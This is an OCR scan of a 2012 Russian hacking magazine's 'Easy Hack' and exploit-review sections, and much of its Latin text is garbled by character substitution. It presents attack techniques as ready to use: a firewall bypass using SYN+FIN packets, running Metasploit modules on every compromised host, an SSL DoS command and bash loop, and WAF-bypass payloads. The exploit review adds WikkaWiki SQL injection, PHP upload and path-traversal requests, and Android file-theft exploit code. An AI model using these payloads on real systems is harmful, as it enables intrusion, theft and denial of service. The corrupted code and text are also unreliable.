Резюме: Для фанатов ІІЬипІи. 



© Іаипсіі 



ТАК ЧТО ЖЕ ВЫБРАТЬ? 

Каждый выбирает сервис под себя. Но если 
хочешь моего совета, то я бы рекомендовал на- 
чинающим разработчикам ЗіШиЬ или ВііЬискеС 
Это отменные сервисы, которые к тому же от- 
лично документированы: ты без труда сможешь 
освоить не только внутреннюю кухню самих 
хостингов кода, но и приобщиться к системе 



контроля версий в целом. У ЗіШиЬ огромное 
комьюнити и один из самых передовых интер- 
фейсов, а ВііЬискеІ позволяет создавать за- 
крытые репозитории — а это дорого стоит. Тем 
программистам, которые специализируются на . 
І\ІеІ, возможно, приглянется СобеРІех — он один 
может похвастаться интеграцией с ѴізиаІ Зіибіо. 
В случае если нужно просто выложить дис- 



трибутив и документацию, а заодно пообщаться 
с пользователями, неплохим выбором будет 
Зоодіе Собе. Если твоя разработка потенци- 
ально может заинтересовать пользователей 
ІІЬипІи І_іпих, то можно попробовать ЬаипсЬРаб. 
АззетЫа и Кііп подойдут программистам, рабо- 
тающим в команде, но им я советовать ничего 
не буду. Они и так все знают :). Ш-И 
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ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




ОБОЙТИ СЕТЕВОЙ ФАЙРВОЛ 



ЗАДАЧА 



РЕШЕНИЕ 

Предположим, что в защищенном файерволом сегменте сети нахо- 
дится некая цель. Также допустим, что входящие соединения с этой 
целью запрещены, а исходящие от нее разрешены. При всем при 
этом файервол использует для подключения динамическую филь- 
трацию кеер-зіаіе, с которой для начала нам и нужно разобраться. 
Проще говоря, динамическая фильтрация — это такая фильтрация, 
при которой для заданного правила автоматически создается об- 
ратное. Например, если есть правило «разрешить трафик отхоста 
А на хост Б с порта ХУ 2 . на 2УХ по протоколу ТСР», то для того, чтобы 
данные могли пройти обратно (отхоста Б кА), файервол также 
должен использовать соответствующее правило. При динамической 
фильтрации обратное правило создается автоматически, как только 
задействуется первое. 

Теперь, когда мы определились с терминами, можно переходить 
непосредственно к обходу файервола. Теоретически мы никак не 
можем добраться до цели, так как любые наши попытки подклю- 
чения (ТСР-пакеты с 5УІ\І-флагом) будут блокироваться. Как ты на- 
верняка знаешь, ТСР/ІР-протоколы очень гибкие, а РРС описывают 
далеко не все тонкости. На этом мы и сыграем. 

Отдельные операционные системы, позволяютустанавливать 
соединения посредством ТСР-пакета с некоторыми дополнительны- 
ми флагами, за исключением 5УЫ (какты помнишь, для установки 
соединения по РРС должен присутствовать только этот флаг). К 
таким ОС относится как ѴѴіпсІоѵѵз, так и І_іпих (правда, не все версии). 
Полный список можно посмотреть по адресу доо.д1/9ти12 . Какие 
именно дополнительные флаги нужны? Такие, которые являются 
легитимными при установленном соединении, то есть, к примеру, 
РІІ\І, АСК, Р5Т (этот список можно продолжать). 

Итак, мы выбрали один из указанных выше флагов. Перейдем ко 
второму этапу, на котором нам нужно найти в файерволе определен- 



ный баг. Он заключается в том, что файер не проверяет присутствие 
БУЫ-флага для уже «установленного» соединения, то есть во входя- 
щем пакете не виден Н5Т-флаг. 

Думаю, теперь общий принцип атаки понятен. Мы должны под- 
ключиться к хосту с помощью ТСР-пакета 5УЫ + РІІ\І, который не 
будет блокирован файерволом, так как тот сочтет, что мы использу- 
ем установленное ранее соединение, а не инициализируем новое, 
запрещенное правилами. Атакуемый хост (наша цель) отправляет 
ответ 5ѴЫ + АСК, а далее идут АСК'и, которые файервол и не должен 
блокировать, так как исходящий трафик от нашей цели разрешен. 

Важный вопрос здесь заключается в том, как часто такие «дыр- 
ки» встречаются в файерволах. Лично я не сталкивался с такими 
уязвимостями в живой природе, но видел на бескрайних просторах 
интернета несколько упоминаний о них. В любом случае идея мне 
кажется довольно интересной, так что дерзай! 




Ѵ*у НВі 4*н 

■ ММ ШяАМлМ І^НЫн Ш’і іл 1 и | 

і- М--3 



Соединение установлено, несмотря на пришедший ТСР-пакетБѴМ-РІЫ 



048 



ХАКЕР 02/157/2012 






ЕА5У НАСК 



ВЗЛОМАТЬ САЙТ НА ѴѴ0К0РКЕ55 



ЗАДАЧА 



РЕШЕНИЕ 

ѴѴогсІРгезБ является одной из самых распространенных СМ5 в 
мире. Она имеет множество плагинов, тем и настроек, что по- 
зволяет с легкостью создавать самые специфические ресурсы, как 
большие, так и маленькие. Конечно, эта особенность привлекает к 
ѴѴогсІРгезз внимание и белых, и черных «шапок». Как это часто бы- 
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Определяем плагины ѴѴогсіРгезз 



вает, после обнаружения какого-либо критичного бага проносится 
волна взломов. Но если основной движок уже не преподносит 
таких сюрпризов, то его плагины — регулярно. 

Для каждого популярного продукта или технологии существуют 
свои сканеры безопасности, позволяющие автоматизировать и 
облегчить труд хакера или ИБ-исследователя. Вот и для ѴѴогбРгезз 
не так давно появился специализированный софт под названием 
ѴѴРЗсап ( собе.доодіе.сот/р/ѵѵрзсап/ ). Автором этого творения 
является Руап ОеѵѵЬигзІ. 

Функционал программы не так широк, как хотелось бы не- 
которым, однако в нем присутствует всё самое необходимое. 
Во-первых, это определение версии и имеющихся в ней паблик- 
уязвимостей. Во-вторых, определение плагинов (в базе ѴѴРЗсап'а 
их 2220) и, опять же, их уязвимостей. В качестве бонуса при- 
сутствует многопоточный брутфорсер имен и паролей. С точки 
зрения применяемых алгоритмов здесь всё тривиально: перебор 
и парсинг ответов. Следует учитывать, что это возможности лишь 
первой версии. По заверениям автора, в последующих будут при- 
сутствовать и сами эксплойты для найденных уязвимостей, что, 
согласись, приятно. 

Пользоваться тулзой достаточно просто. (Надеюсь, на твоей ма- 
шинке установлен РиЬу? :)) 

гиЬу ./ырзсап.гЬ --игі ыыы.ехатріе.сош --епитегаііе р 

Здесь «--игі ѵѵѵѵѵѵ.ехатріе.сот» — это сканируемый хост, а пара- 
метр «--епитегаіе р» указывает на то, что модуль для определения 
плагинов подключен. Кстати, с помощью этой тулзы можно попро- 
бовать просканировать и свой ресурс, но лучше всё же воспользо- 
ваться специальными плагинами для ѴѴогсІРгезз вроде ѴѴР Зесигііу 
5сап ( доо.д І/Уксп8 ). 



ПРОКАЧАТЬ ВЫВОД ИЗ ЫМАР 



ЗАДАЧА 



РЕШЕНИЕ 

Все мы знаем и используем в своих легальных и не очень делах 
такую утилиту, как ІМтар [ птар.огд ]. Одним из преимуществ этой 
программы являются способы вывода информации. У ІМтар их 
четыре: 

1. птар(-оІМ) — подефолту. 

2. дптар (-оО) — вывод в строку для удобного применения в дгер. 

3. хтІ(-оХ) — вывод в форматеХМБ. 

4 . $сгІрІ КЮйіЗ (-о5) — для фанов Іееізреак. 

Кроме того, используя аргумент -оА, можно организовать 
вывод сразу в первых трех перечисленных форматах. По факту 
самым юзабельным для операций поиска является формат дптар, 
а для анализа — ХМІ_ (через 2епМар, например). Но что если нам 
хочется приложить красивый лог скана к какому-нибудь отчету о 
проделанной работе? Ни один из приведенных форматов для этого 
не подходит. Можно, конечно, распарсить ХМІ_, но мы поступим 
проще! 

Итак, идем на хтІзоН.огд/ХЗІ-Т/хзІІргос.ЬітІ и качаем там ма- 
ленькую программку под названием хзііргос (кстати, она входит в 
комплект ВаскТгаск), затем пишем в консоли следующую команду: 

хзіііргос птар зсап.хті -о птар зсап.ІгЕтІ 

Здесь первый параметр — это скан птар в ХМБ-формате, а 



второй — имя итогового файла. На выходе получаем симпатичный 
удобочитаемый НТМБ-документ. Отмечу, что, хотя всё это и вы- 
глядит довольно просто, описанная тулза имеет довольно широкие 
возможности — ее можно использовать для форматирования 
других типов ХМБ-файлов. 




Красивый вывод из Ытар за пару кликов 
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ВЗЛОМ/ ЕА5ѴНАСК 



КОМАНДОВАТЬ СРАЗУ ВСЕМИ ШЕЛЛАМИ ИЗ МБР 



ЗАДАЧА 



РЕШЕНИЕ 

Хочу рассказать тебе об одном маленьком, но крайне юзабельном 
трюке. Если мы проникли сразу на несколько машин, то, чтобы не 
писать команды в каждой из полученных сессий, мы можем восполь- 
зоваться радостями доступа к РиЬу прямо из консоли М5Р, запустив 
постмодуль сразу во всех сессиях: 

гп5-Р> иве ров1:/ыіпсІоы5/§а1:Ііег/епит_сІотаіп_1:океп5 
ГП5-Р епит_сІотаіп_1:океп5> ігЬ 
■Егатеыогк.вевБІопБ.еасІі кеу сіо | 5Ѳ5біоп | 
гип_5Іп§1е("5е1: 5Е55ІОІМ #{5Ѳ55Іоп}") 

ргіп 1 :_ 5 І:а 1 :и 5 ("Киппіп^ #Іас1:іѵе_тосІи1е.-Ри11пате> 

а^аіпБІ: #{5е55Іоп}") 



гип_5Іп§1е("гип" ) 



БІеер 1 




епсі 





Код получился тяжеловатым, но мы можем вписать его в гс-файл и 
при необходимости запускать с помощью следующих команд: 

гті5-Р> изе ро5І:/ыіпсІоы5/§а1:Ііег/епит_сІотаіп_1:океп5 
тБ-Р епит сіотаіп ѣокеп5> пезоипсе гипаіі.пс 

Всё! Постмодуль запущен на всех поовненных машинах. За эту идею 
респектуем .кгап'у [ доо.аІ/зІЬХЯ . 



ЗАЛОВИТЬ СЕРВЕР С ПОМОЩЬЮ ББЬ 



ЗАДАЧА 



РЕШЕНИЕ 

Продолжаем мучить 551_. В позапрошлом выпуске рубрики мы 
разбирали уязвимость под названием 55І_ Репедаііоп ѵиіп в 
55І_ѵЗ/ТІ_5-протоколе. Информация о ней была обнародована в 
далеком 2009 году, поэтому в большинстве случаев она давно 
прикрыта. Как бы то ни было, официальные патчи уже есть, а 
гепедаііоп (то есть переинициализация того же защищенного 
ТСР-соединения) уже не является опасной фичей, а потому у 
многих включена. 

Теперь давай рассмотрим другую интересную особенность 
55І_-протоколов. При установке защищенного соединения сервер 
затрачивает гораздо больше процессорного времени (то есть боль- 
ше использует процессор), чем клиент. Как ясно из задачи, этой 
особенностью можно воспользоваться в деструктивных целях. :-) 

К слову сказать, о ней известно довольно давно, но лишь недавно 
группа ТНС представила тулзу, которая реализует описываемый 
тип 0о5-атаки для 551 ( ѵѵѵѵѵѵ.іЬс.огдЛЬс-55І-сІ05 ). Атака фактиче- 
ски организуется путем множественных операций переинициа- 
лизации защищенных соединений (гепедаііоп) в контексте одного 
551-соединения. 

Какова мощь такой атаки? Всё достаточно сурово. Предста- 
вители ТНС пишут, что сервер затрачивает на установку соеди- 
нения в 15 раз больше ресурсов, чем клиент, а средний сервер 
может поддерживать порядка 300 инициализаций-соединений в 
секунду. Таким образом, имея всего лишь один атакующий хост с 
нормальным каналом связи (051), мы сможем завалить прилич- 
ный сервер. 

Насколько это соответствует действительности? Здесь есть ин- 
тересные нюансы. ИБ-специалист Ѵіпсепі Вегпаі провел исследо- 
вание, посвященное способам защиты от 55І_ 0о5'а ( доо.дІ/Цдѵѵ8о ). 
В ходе исследования он выяснил, что затраты процессорного 
времени сильно зависят от используемого алгоритма шифрова- 
ния и, как видно из картинки, не настолько велики, хотя разница 
всё же заметна. Следовательно, успешность атаки теоретически 
определяется алгоритмом шифрования. 

Что касается атаки на практике, то здесь всё просто. Берем из- 
вестную тулзу от ТНС и запускаем ее следующим образом: 

Тііс-ббі-сіоб . ехе 127.1.1.1 443 --ассерТ 

Здесь 127.1.1.1 — ІР нашей жертвы, 443 — порт атакуемого сер- 




Запускаем 551. РоБ 



виса (поддержка 55І_ обязательна), «--ассері» — подтверждение 
того, что мы не делаем ничего плохого. :-) 

Кстати, функция гепедаііоп вовсе не обязательна для атакуемо- 
го сервера. Атаковать можно и без нее, просто создав множество 
55І_-соединений, однако нагрузка на канал и клиентскую машину 
при этом увеличится в разы. Также атаку можно провернуть и без 
тулзы. Вот небольшой ЬазЬ-скрипт оттой же ТНС: 

1:Мс - ББІ-сІОБІІ: ( ) { ыІіі1е„із сіо (мбііе до есбо К; сіопе) |\ 
орепББІ Б сі іепі: -соппесР 127.1.1.1:443 2>/сІеѵ/пи1 1; сіопе }\ 
Тог х іп 'зец 1 100 сіо ііііс-ббі-сіобіі: & сіопе 

Хотелось бы также отметить, что атакуемым сервисом необязатель- 
но должен быть НТТР5. Подойдет любой другой порт, поддержи- 
вающий 55І_ (РТРб, РОРЗб), потому как сервер один и процессорное 
время тоже одно. Если же говорить о защите, то здесь потребуется 
как минимум отключить функции клиентского гепедаііоп’а, исполь- 
зовать менее навороченные алгоритмы шифрования и ограничить 
количество инициализаций-соединений с одного ІР. Подробности 
ты найдешь по ссылке доо.аІ/Цдѵѵ8о. 
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ЕА5Ѵ НАСК 



ОБОЙТИ ѴѴАР 



ЗАДАЧА 



РЕШЕНИЕ 

Как тебе уже наверняка известно, ѴѴАР (ѵѵеЬ арріісаііоп ПгеѵѵаІІ) 

— это файервол, который работает на уровне приложения модели 
051. В простейшем виде эта штука нацелена на блокирование 
таких запросов к ѵѵеЬ-серверу, которые пытаются выполнить 501- 
инъекцию или Х55. ѴѴАР уже давно превратился из модной фичи 
для гиков в необходимую для любого более-менее крупного веб- 
проекта вещь. Хотя на практике даже у тех организаций, которые, 
казалось бы, просто обязаны заботиться о безопасности пользо- 
вательских данных (банки, магазины), ѴѴАР'ы если и имеются, то 
только для галочки. То есть они или совершенно устарели, или 
просто не настроены, или же настроены, но неправильно. Предпо- 
ложим однако, что наша цель всё же защищена нормальным ѴѴАР. 
Что делать? Есть несколько основных способов их обхода. Одним из 
таких способов является модификация запросов к серверу. Обойти 
защиту с его помощью удается за счет того, что, хотя протокол 
НТТР стандартизирован и описан в множестве РРС, обработчики 
запросов для разных веб-серверов реализованы очень по-разному. 
Насколько сильно они отличаются, мы увидим дальше. 

Одним из классических примеров издевательства над НТТР яв- 
ляется прием НРР (НТТР Рагатеіег РоІІиІіоп). Что это? Для ответа 
обратимся ктеории. Во-первых, кданным, которые пользователь 
передает серверу, присоединяется так называемая Оиегу 5ігіпд. 
Она следует за символом «?». Во-вторых, данные пользователя 
разделяются на пары вида «имя_параметра=значение». В-третьих, 
эти пары конкатенируются друг с другом с помощью символа «&» 
или «;». Если пользовательские данные содержат спецсимволы, то 
они должны быть закодированы специальным образом (например, 
игіепсобе в РНР). Пример правильных запросов: 

#(зЕТ 

СЕТ /-Роо?рап1=ѵа11&раг2=ѵа12 НТТР/1.1 



#Р05Т 

Р05Т /-Роо НТТР/1.1 
Соп1=еп1=-Іеп§1=Іі : 19 



раг1=ѵа11&раг2=ѵа12 

Итак, НРР представляет собой повторение имен параметров с 
разными значениями. Так как подобное поведение, по идее, не 
определено в РРС, то разные веб-сервера будут обрабатывать та- 
кие входные данные по-разному. Вот пример типичного «загрязне- 
ния параметров НТТР»: 

СЕТ /Тоо?раг1=ѵа11&раг1=ѵа12&раг1=ѵа13 НТТР/1.1 



Этому запросу соответствуют следующие входные параметры: 

• для А5Р и А5Р.ЫЕТ — значения, разделенные запятыми 
(раг1=ѵаІ1,ѵаІ2,ѵаІЗ); 

• для АрасЬе и РНР — последнее значение (раг1=ѵаІЗ); 

• для АрасЬе и РегІ — массив (АРРАѴ[0х8Ь9059с]]; 

• для АрасЬеТотсаІ — первое значение (раг1=ѵаІ1). 

Чем эта информация может быть нам полезна? Как минимум по- 
зволит определить тип веб-сервера и используемую технологию. 
Максимум того, что она помогает выяснить, очень сильно зависит 
как от самого сервера, так и оттого, как работают и каким функ- 
ционалом обладают сами скрипты. Более подробно НРР описан 
в презентации от Биса СагеМопі и 5Ыапо бі Раоіа ( доо.дІ/9Ь9Іх ). А 
теперь давай вернемся к обходу ѴѴАР и посмотрим, как применяет- 
ся техника НРР, на примере Моб5есіігіІу для А5Р: 

#Такой запрос блокируется 

іпбех. а5рх?ра§е=5е1ес1: 1.2.3 -Ргот ІіаЫе ыііеге іб=1/ 



#А такой - нет 

іпбех. аврх?ра§е=5е1ес1: 1&ра§е=2,3 -Ргот іаЬІе ыбеге іб=1 

Следует учитывать, что НРР уже давно не является новой тех- 
нологией. Указанная выше презентация датируется 2009 годом. 
Можно придумать бесконечное множество подобных НРР-трюков, 
чем и занялся Іѵап Магкоѵіс из Ыеіѵѵогк 5оІиііоп (пеізес.гз), 
который в итоге опубликовал небольшую ѵѵЫіерарег про НТТР 
Рагатеіег Сопіатіпаііоп (НРС). Чтобы лучше понять новый метод, 
давай снова обратимся ктеории. 

Итак, согласно РРС, для НТТР определены две группы символов: 

1. Зарезервированные, или специальные — а- 2 , А-2, 0-9 апб _.!-*'(). 

2. Незарезервированные — ;/?: (б & = + $,. 

Однако если ты прямо сейчас посмотришь на свою клавиатуру, 
то обнаружишь там еще и символы { } I \ Л [ ] '. Вот на них-то наш 
сербский друг и акцентировал свое внимание. Он вставлял эти 
символы в имена и значения параметров. Итоги его работы ты 
воочию сможешь увидеть на прилагаемом скриншоте. 

В качестве доказательства эффективности НРС приведу несколько 
примеров обхода ѴѴАР. 

1. МосІБесигіІу.Запрос вида бир://ІосаІЬо5І/?хр_стб5ЬеІІ блокиру- 
ется, а запрос Шр://ІосаІЬо5І/?хр[стб5ІіеІІ — нет. 

2. Обход сіігігаѵегзаі ІІКІ_5сап. Запрос вида Шр://192.168. 2.105/ 
Іе5Ра5р?{іІе=../Ыа.М блокируется, а запрос Мір://1 92.1 68.2.1 05/ 
1е5Ра5р?1ч1е=.%./Ыа.1х1 — нет. 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д.1) 



Обзор 

эксплоитов 

В нашунелегкуюэпохубуйства компьютерныхтехнологий мы с ра- 
достью представляем очередной обзор нашумевшихуязвимостей 
и сплоитовдля них. Каквсегда, призываемтебя использовать их 
не хулиганства ради, а защиты для! 




^ Множественные уязвимости в ѴѴіккаѴѴікі 



СѴ55Ѵ2 7.5 



(:М/АС:І_/АІІ:І\І/С:Р/І:Р/А:Р) 

В конце ноября была опубликована информация об уязвимостях 
в движке ѴѴіккаѴѴікі, найденных товарищем Едісііо Рота по ака 
ЕдіХ. Что примечательно, на момент публикации уязвимости ещё 
небыли закрыты: исследователь выжидал почти два месяца по- 
сле отправки отчета разработчику, но тот по каким-то причинам 
не торопился исправлять баги. 



будет ошибка). Однако всегда можно выполнить подзапрос и увести 
идентификатор сессии админа. Вот при мер та ко го за проса: 

РОБТ /мікка/Ц5ег5е1:1:іп|55 НТТР/1.1 
Нобі:: Іосаіііозі: 

Соокіе: 96522Ь217а86еса82-Р6сІ72е-Р88с4с7-Р4=сЗи94Ьо2с5ІисІ 
ід Зѵ18787і4р6 
Соп1:еп1:-І_еп§1:Іі : 140 

Сопііепіі-Туре : арр!іса1:іоп/х-і\/мм--Рогт-иг1епсосІесІ 
Соппесіііоп: кеер-аііѵе 



ас1;іоп=ирсІа1:е&етаі1=1:е5І:%401:е5І: . сот& 
сІе-Раи11:_соттеп1:_сІІ5р1ау= ' л етаі1= 



ЕХРЮІТ 



1. ЗОБ-инъекция в операторе ІІРОАТЕ. Уязвимый код находится 
в файле /асЛопз/изегзеШпдз/изегзеШпдз.рбр, строки 140-152: 

сІе-Раи11=: // іприі: із ѵаіісі 
$Ш5-Х2иегу(" 

ЦРРАТЕ " . $Шб - >6е1=Сопб^Ѵа1ие ( ' ІіаЫе ргебх ' V цбѳг б 
БЕТ етаіі = " І .ту5д 1 _геа1_е5саре_5~Егіп§($етаі1).'" . 
сІоиЫес1іскесІі1:= ' " .ту5я1_пеа1_ѳ5саре_5І:піп§($сІоиЫес1іскесІі1:) . " ' 
5Ііоы_соттеп1:5= '_Л.ту5д1_геа1_е5саре_5І:гіп§($5Ііоы_соттеп1:5) , 
сІе-Раи11:_соттеп1:_сІІ5р1ау= ' " .$сІе-Раи11:_соттеп1:_сІІ5р1ау. " ' , 
геѵІБІопсоипІ: = "^пеѵізіопсоипі:.". 
сНап^еБсоипІ: = ".$сііап^е5соип1:.". 

Ііііете = " , .ту5^ 1 _^еа1_е5саре_51:^іп§($и5е^1:I^ете)." , 

ЫНЕКЕ пате = " , .$и5е^[ , пате , ]." , 

ИМИ 1" 

:и_ 



При выполнении запроса, содержащегося в этом коде, мы видим, 
что функция ту5дІ_геаІ_е5саре_5Ігіпд() предварительно не об- 
рабатывает параметр сІеі : аиИ:_соттеп1:_сІІ5рІау, а значит, мы можем 
внедрить в него произвольный 5СИ_-запрос. В некоторых случаях 
нам неудастся изменитьсодержимоетаблицы изегз, например 
пароль админа, по двум причинам. Во-первых, указанный запрос 
является многострочным, а во-вторых, последние версии Му5С1І_ 
не поддерживают незакрытые комменты (ком мент, открывающий- 
ся значками /*, должен всегда оканчиваться значками */ — иначе 
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Обзор эксплоитов 



(5ЕІ.ЕСТ зеззіопісі РКОМ мікка_5ез5Іопз ІлІНЕКЕ 
изегісІ = ' ІлІікіАсІтіп ' ) .Д1іете= ' 

В том случае, если админ в данный момент залогинен, атакующий 
увидитидентификаторегосессии в полеформы ІІзегБеШпдз, пред- 
назначенном для ввода е-таіГа. Если админ вручную не завершил 
сеансработы всистеме (то есть не нажал на І_одоиі), атакующий 
сможетиспользоватьномерегосессии, который останется в БД. 
Благодаря функции тадісСіиоІезѴѴогкагоііпсІ, успешная эксплуата- 
ция даже не требует директивы «тадіс_диоІез_дрс = оіТ». 

2. Загрузка произвольных файлов. Уязвимый код содержится 
в файле/асІіопз/ЛІез/НІез.рЬр, строки 266-278: 

еізеі-р (рге^ таІісІіС Ѵ.+\. ( ' ЛаПомесІ ехѣепзіопз. 

1 )$/і*. $_РИЕ5[ 'біе' ] [ 'пате' ])) 

$зѣгірресІпате^_ з1:г_гер1асе( ' \ 1 ' . 1 ' , 

$_РІІ-Е5[ 'біе' ][ 'пате' ] ); 

$зѣгірресІпате = гамиг1епсо6е($5ѣгірресІпате); 

$з1=гірресІпате = зѣгірзІазбез^зѣгірресІпатеѴ. 

$сІез1:б1е = $ир1оасІ_ра1:Іі.0ІКЕСТ0КУ_5ЕРАКАТ0К.$5І:гірресІпате; 



1б1е_ехіз1:5($сІе5І:б1е)) { 

і-р (тоѵе_ир1оасІесІ_б1е($_РІІ_Е5[ 'біе' ІТТѢтр^ате' ], 
^сІезІібІе ^Н 

$по1=ібса1=іоп тз^ = Т Г'РіІе шз зиссеззбиііѵ иріоасіесі. " ); 

} 

Если в конфиге присутствует параметр 1 1 ЫТРАИ ЕТ_М О О Е' или ата- 
кующий похитил идентификатор сессии с помощью вышеописанно- 
го бага, то он может за грузить на сервер файл с двойным расширени- 
ем, что позволит ему, например, выполнить произвольный РНР-код. 
Стоитобратить внимание на переменную $аІІоѵѵесІ_ехІеп5Іоп5, в ко- 
торой определены допустимыетипы файлов. Воткакона выглядит: 

' I Д Р е § ІЗР8ІЗ ре I рпе I гіос|х1з|сзѵ | ррѣ | ррі | ррз | роѣ | рсІ6_| 

азе | ѣхѣ | гір | §ѣаг | §2 | Ь 22 1 ѣаг_|_гаг | ѵрр | трр | ѵзсі | тт | бѣт | бѣті ' 

В этом списке присутствуют достаточно редкие расширения, которые 
не отражены в МІМЕ-типах конфигурации АрасЬе, например тт, ѵрр, 
в результате чегоу атакующего появляется возможность выполнить 
произвольный РНР-код. Следующий запрос демонстрирует загрузку 
файла с именем ІезІ.рЬр.тт и содержимым <?рИр рЬріпѣоО; ?>: 

Р05Т /ыікка/ѣезѣ НТТР/1.1 
Нозѣ: Іосаібозѣ 

С о о к і е : 965226 2 17 а 8 бе с а 8 2 6 6 сі 7 2 е 6 8 8 с 4 с 7 64= и р д бзсІсІБгѣс 0 і 

Ь55§ѵ3610д сІѢЗ 

Сопѣепѣ- ѣеп^ѣіі : 251 

Сопѣепѣ-Туре : тиіѣірагѣ/богт-сіаѣа ; 

ЬоипсІагу= 1503534127 

Соппесѣіоп : кеер-аііѵе 



1503534127 

Сопѣепѣ-Оізрозіѣіоп : бопт-сіаѣа; пате="б1е" ; 
б1епате="ѣезѣ . рбр . тт" 

Сопѣепѣ-Туре : арріісаѣіоп/осѣеѣ-зѣгеат 



< ? рИр рб ріпбоО ; ?> 

1503534127 

Сопѣепѣ-Оізрозіѣіоп : бопт-сіаѣа; пате="ир1оасГ 



ІІрІоасІ 

1503534127- - 



3. Выгрузка произвольныхфайлов. Интересующий нас код со- 
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Уязвимый код в/НапсІІегз/бІез.хтІ/бІез.хтІ.рНр 

держится в файле/ЬапсІІегзЛіІез.хтіЛіІез.хтІ.рЬр. Ты можешь 
увидеть его на соответствующем рисунке. Проверка передан- 
ного пользователем имени файла производится единственный 
раз, в строке 54, и отсекает все файлы, имя которых начинается 
сточки. Такой прием не помешает атакующему реализовать атаку 
типа РаіЬТгаѵегзаІ — запрос на скачивание конфигурационного 
файла движка вы глядит та к: 

бѣѣр і/уіосаіііозѣ/мікка/ѣезѣ/біез . 

хт1?асѣіоп=сІоып1оасІ&б1е=/ . ./. . /мікка . соп6§ . рбр 

4. Ну и на десерт произвольное выполнение кода. Уязвимый код 
содержится в функции ІодБратП файла/ІіЬз/ѴѴакка.сІазз.рЬр, 
строки 1315-1343: 

бипсбіог Іо^Брат^буре^ѣа^ЬосІу^геазоп^игІсоипѣ^изег^ 

' ,$біте=' ' ) 

і_ 

$з р ат1о§ ра бІі = ( і ззеб($бІіІ5->соп б §[ ' зрат і о ^ ра б б ' ] )) ? 
$ббіз->сопб§ [ ' з ратіо^рабб ' ] : РЕР5РАМІ.06РАТН; 

іб ( $изег == ' ' ) 

$изег = $ббІ5->СебІІзегМате() ; 

} 

іб ($біте == 11 ) 

{ 

$біте = сІабе( 'У-т-сІ Н : і : з 1 ) ; 

} 

(рге§_таѣсб( '/ л тазз сіеіебе/ ' _,$геазоп)) 

$огі^іпід = '0.0. 0.0'; 

} 

еізе 

{ 

$огі§іпір = $_БЕКѴЕК[ ' КЕМОТЕАР Р К ' ] ; 

} 

$иа = (іззеб($_5ЕКѴЕК[ , НТТР_ІІ5ЕК_АеЕМГ ])) ? 

1 [ 1 . $_БЕКѴЕК[ 1 НТТРІІБЕКАОіЕІМТ 1 ] . 1 ] 1 : '[?]': 

$ЬосІу = бгіт($ЬосІу) ; 

$зі§ = 5РАМІ_ОС_5ІС. ' 1 .$буре.' ' .$біте.' ' .$ба§. 1 - 
$огі§іпід. ' - ' .$изег.' ’.$иа. ' - ’^геазоп.' - 
$иг1соипб. "\п"; 



$сопбепб = $зі%.$ЬосІу. "\п\п" ; 

гебигп $ббіз->аррепсІРі1е($5рат1о§рабб.$сопбепб) ; 

} 

Если в конфиге включена опция зрат_Іоддіпд, то атакующий сможет 
внедрить произвольный РНР-код в файл, заданный в переменной 
$зратІодраІб (по умолчанию ./зратІод.М.рбр) через элемент 
массива $_5ЕКѴЕК['НТТР_и5ЕК_АСЕІ\ІТ']. Запрос, иллюстрирующий 
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вышесказанное: 

Р05Т /мікка/іезі/асісісоттепі НТТР/1.1 
Нозі: ІосаІІіозі 

Соокіе: 96522Ь217а86еса82-РбсІ72е-Р88с4с7-Р4=611105Пѵе-Рб42 
оаз'аѵѲи-Рпр83 

ІІзег-А§епі: < ? р И р рМріп-Ро ( ) ; ?> 

Сопііепі:- Беп^І: Рі : 27 

Сопіепі-Тѵре : арр1ісаііоп/х-ілМлПл/--Рогт-иг1епсосІесІ 
Соппесідх>п: кеер-аііѵе 
ЬосІѵ=іоо&зиЬтіі=АсІсІ+Соттепі 



ТАК6ЕТ5 



ѴѴіккаѴѴікі <= 1.3.2. 



БОИЛКЖ 



Установить обновления ѴѴікка 1.3.2-р7. 

■■ Кража данных с аппаратов на платформе 
^ АпсІгоісІ 



СѴ55Ѵ2 4.3 



(АѴ: Ы/АС : М/Аи : N/0 : Р/І : Ы/А: N ] 

Ы;1І=и 

Быстро растущая популярность ОС АпсІгоісІ привлекает внимание 
хакерского сообщества. В ней регулярно находятразличного рода 
баги безопасности. Сегодня речь пойдетобуязвимости, благодаря 
которой атакующий может получить содержи мое любого файла 
сустройства под АпсІгоісІ. 



ЕХРЮІТ 



Уязвимость обусловлена несколькими факторами: 

1. Стандартный браузер в АпсІгоісІ в некоторых случаях не оповеща- 
ет пользователя о скачивании файла. 

2 . С помощью специального ЭаѵаБсгірІ-кода можно заставить брау- 
зер открыть любой файл, хранящийся в памяти устройства. 

3. С помощьюспециального Эаѵа5сгірІ-кода можно получитьсо- 
держи мое любого локального файла. 

Эксплоит, которому на ЕхрІоіЕ БВ присвоен номер 18164, действует 
в несколько этапов. На нулевом этапе пользователю предлагается 
пройти по вредоносной ссылке: 

іипсііоп зіа^еѲ^зсгі ріиг!) { 

есбо /ЧЬ>АпсІгоісІ < 2 . 3 . 4</ЬхЬг >Раіа 5іеа1іп§ ІдІеЬ 
Ра§е<ЬгхЬг>С1іск : <а бге^Ѵ^зсгіріигІРзіа^е^Ѵ 1 > 
Маіі с іоиз Ипк</а>" ; 

■Ь- 

Первый этап — ред и рект пользователя на страничку с вредоносным 
ЭаѵаЗсгірІ-кодом, который без ведома пользователя скачивается 
при помощи контент-провайдера сот.апсІгоісІ.МітІЕіІергоѵісІег: 

-РипсЕіоп з іа^е1('$зсгіріиг1’) { 
есііо "<ЬосІу оп1оасІ=\"5еіТітеоиі( ’ыіпсіоы. Іосаіііоп 
= \ 1 $зсгіріиг1?зіа^е=2\ 1 1 . 1000) ; зеіТітеоиі( ’ыіпсіоы. 
1осаііоп=^‘ сопіепі : //сот. апсігоісі . ІгЕтІбІерпоѵісІеп/ 
зсісагсі/сіоыпіоасі/рос . ІгЕтІХ ' ' . 5000) ; \ ; 

} 

Второй этап — выполнение вредоносного ЭаѵаБсгірІ-кода на ло- 
кальном устройстве и получение требуемых файлов. Вредонос- 
ный код смотри на соответствующем рисунке. 

Третий этап — загрузка файлов на удаленный сервер: 

іипсііоп зіа^еЗО { 

$-рр = ■РорепС'йІез.іхі", "ш" ’) ог 

с!іе( "Соцісіп-* * 1: ореп біе -Рог мгіііп%! " V. 



